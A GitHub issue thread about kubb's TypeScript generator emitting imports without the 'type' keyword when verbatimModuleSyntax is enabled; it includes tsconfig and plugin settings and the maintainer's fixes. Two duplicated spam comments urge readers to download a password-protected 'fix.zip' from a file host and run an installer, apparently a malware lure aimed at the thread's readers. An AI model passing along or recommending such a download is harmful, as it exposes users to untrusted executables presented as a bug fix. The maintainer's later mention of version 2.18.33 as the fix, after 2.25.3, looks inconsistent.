### ISSUE TITLE
Generating models with `@kubb/swagger-ts` errors when using `verbatimModuleSyntax` from Typescript (>= 5.0)

### ISSUE THREAD

**Issue by filipjakov** [kubb-labs/kubb#1143]
### What version of `kubb` is running?

2.25.2

### What platform is your computer?

MacOS

### What version of external packages are you using(`@tanstack-query`, `MSW`, `React`, `Vue`, ...)

2.25.2

### What steps can reproduce the bug?

- add `verbatimModuleSyntax` in the Typescript configuration of the project

### How often does this bug happen?

Every time

### What is the expected behavior?

- `@kubb/swagger-ts` should generate `import`s with the `type` keyword

### Additional information

Maybe expected, but what is the solution if I want to keep kubb with `verbatimModuleSyntax`?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stijnvanhulle** [comment]
@filipjakov Hi, can you show me an example of one of the outputs that is not correct? 

Normally Kubb adds `export type` or `import type` when a file or import has only types available.

**Comment by filipjakov** [comment]
You can use for example: [https://github.com/OAI/OpenAPI-Specification/blob/main/examples/v2.0/json/petstore-simple.json](https://github.com/OAI/OpenAPI-Specification/blob/main/examples/v2.0/json/petstore-simple.json)

When you check generated models:

![image](https://github.com/user-attachments/assets/0fec240c-6caa-4d5e-8c7a-bfa0492e5124)

tsconfig is the following:

```json
{
	"$schema": "https://json.schemastore.org/tsconfig",
	"compilerOptions": {
		"strict": true,
		"allowUnreachableCode": false,
		"allowUnusedLabels": false,
		"exactOptionalPropertyTypes": true,
		"noFallthroughCasesInSwitch": true,
		"noImplicitOverride": true,
		"noImplicitReturns": true,
		"noPropertyAccessFromIndexSignature": true,
		"noUncheckedIndexedAccess": true,
		"noUnusedLocals": true,
		"noUnusedParameters": true,

		"module": "ESNext",
		"moduleResolution": "Bundler",
		"resolveJsonModule": true,

		"declaration": true,
		"declarationMap": true,
		"removeComments": true,

		"allowJs": false,

		"esModuleInterop": true,
		"isolatedModules": true,
		"forceConsistentCasingInFileNames": true,

		"target": "ESNext",
		"emitDecoratorMetadata": true,
		"experimentalDecorators": true,

		"composite": false,
		"incremental": true,

		"preserveWatchOutput": true,

		"skipLibCheck": true,

		"assumeChangesOnlyAffectDirectDependencies": true,

		"verbatimModuleSyntax": true
	}
}

```

**Comment by stijnvanhulle** [comment]
@filipjakov This will be fixed in the next release of Kubb(creating a new release right now).

**Comment by stijnvanhulle** [comment]
You can install kubb v2.25.3 to resolve your issue.

**Comment by filipjakov** [comment]
Works, thank you 🙏

**Comment by filipjakov** [comment]
I lied, it still doesn't work as expected. You can check the swagger I in the previous comment: https://github.com/kubb-labs/kubb/issues/1143#issuecomment-2311747403

With this config:
```ts
pluginTs({
	output: {
		path: './models',
		exportType: false,
	},
	enumType: 'asConst',
	unknownType: 'unknown',
	optionalType: 'questionToken',
}),
```

the generated `models/Pet.ts` still errors:

![image](https://github.com/user-attachments/assets/b263fc72-3bae-468b-9c97-4c514490d5ca)

**Comment by loferreiranuno** [comment]
Having the exact same problem :)

**Comment by stijnvanhulle** [comment]
@loferreiranuno @filipjakov There was one part missing so I added this, version [2.18.33](https://github.com/kubb-labs/kubb/releases/tag/kubb%402.18.33) should now work :)

**Comment by filipjakov** [comment]
@stijnvanhulle everything seems fine now, thanks!

**Comment by loferreiranuno** [comment]
Thank you @stijnvanhulle  now works :)
